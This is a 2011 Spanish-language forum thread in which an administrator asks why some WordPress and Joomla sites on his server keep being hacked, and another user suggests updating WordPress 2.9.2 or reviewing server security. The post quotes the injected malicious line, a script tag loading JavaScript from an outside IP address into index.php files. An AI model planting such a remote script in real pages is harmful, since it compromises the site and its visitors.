Foros del Web » Creando para Internet » Sistemas de gestión de contenidos » WordPress »

Mi WP está hackeado?

Estas en el tema de Mi WP está hackeado? en el foro de WordPress en Foros del Web. Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda ...
  #1 (permalink)  
Antiguo 14/04/2011, 01:53
 
Fecha de Ingreso: septiembre-2009
Ubicación: Wheel of Time
Mensajes: 30
Antigüedad: 14 años, 7 meses
Puntos: 0
Mi WP está hackeado?

Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda una web de esas 3 otra vez padeció el hack.

El hack en las 3 webs es el mismo y de estas 2 son WP y otra es Joomla.

Actualmente la web fue hackeada otra vez y está en WP, el hack consite en que en el index.php de la home y en el index.php del wp-admin queda inyectado al principio del fichero el siguiente script:
<script type="text/javascript" src="http://213.175.200.227/js.php"></script>
quitándolo se soluciona el problema, pero claro me va a volver a pasar.

Es un problema de seguridad del servidor o de los CMSs ?

La versión del WP hackeado es 2.9.2

<meta name="generator" content="WordPress 2.9.2" />

Creo que las contraseñas son correctas en lo referente a FTP, pero no me cabe duda de que en el servidor dedicado haya contraseñas a otras webs que sean accesibles...

Podéis comentarme algo al respecto? algo de ayuda por favor porque no sé como solucionarlo.

Aviso que soy espabilado y un empujón en la dirección correcta... yo me lo curro!

Muchas gracias por responder de antelación!
  #2 (permalink)  
Antiguo 16/04/2011, 07:58
Avatar de Lopezito  
Fecha de Ingreso: junio-2010
Mensajes: 367
Antigüedad: 13 años, 9 meses
Puntos: 17
Respuesta: Mi WP está hackeado?

Cita:
Iniciado por Elyas Ver Mensaje
Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda una web de esas 3 otra vez padeció el hack.

El hack en las 3 webs es el mismo y de estas 2 son WP y otra es Joomla.

Actualmente la web fue hackeada otra vez y está en WP, el hack consite en que en el index.php de la home y en el index.php del wp-admin queda inyectado al principio del fichero el siguiente script:
<script type="text/javascript" src="http://213.175.200.227/js.php"></script>
quitándolo se soluciona el problema, pero claro me va a volver a pasar.

Es un problema de seguridad del servidor o de los CMSs ?

La versión del WP hackeado es 2.9.2

<meta name="generator" content="WordPress 2.9.2" />

Creo que las contraseñas son correctas en lo referente a FTP, pero no me cabe duda de que en el servidor dedicado haya contraseñas a otras webs que sean accesibles...

Podéis comentarme algo al respecto? algo de ayuda por favor porque no sé como solucionarlo.

Aviso que soy espabilado y un empujón en la dirección correcta... yo me lo curro!

Muchas gracias por responder de antelación!
Tal vez, sea la versión de wordpress, ya que es vieja, deberías actualizarlas para mejorar las seguridad.
Puede ser también el servidor, si no te ofrecen seguridad o directamente no tiene buena seguridad, puede ser el servidor..
La verdad de wordpress, las versiones anteriores a 3.0, no tengo mucha idea, ya que no las utilice, porque cuando yo empece con aprender a hacer webs y demás, ya estaba la 3.0
Saludos.

Etiquetas: aplicaciones-prefabricadas
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 1 personas




La zona horaria es GMT -6. Ahora son las 14:41.